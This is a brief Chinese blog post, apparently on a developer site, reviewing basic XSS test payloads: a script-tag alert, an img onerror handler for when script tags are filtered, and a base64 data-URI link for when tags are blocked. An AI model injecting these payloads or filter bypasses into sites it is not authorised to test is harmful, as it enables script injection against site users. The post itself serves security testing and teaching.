0
点赞
收藏
分享

微信扫一扫

回顾几个常见的XSS漏洞测试脚本

独孤凌雪 2022-04-29 阅读 46
web安全

回顾几个常见的XSS漏洞测试脚本
基础的测试:

<script>alert('xss')</script>
如果过滤了指定标签 比如:<script>标签
<img src=x onerror="alert('xss')"/>
--常用的on事件:onerror(), onclick(), onmouseover()等
如果标签都被过滤了,可以考虑编码(但需要注意编码输出点是否会解析)
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">test</a>
举报

相关推荐

0 条评论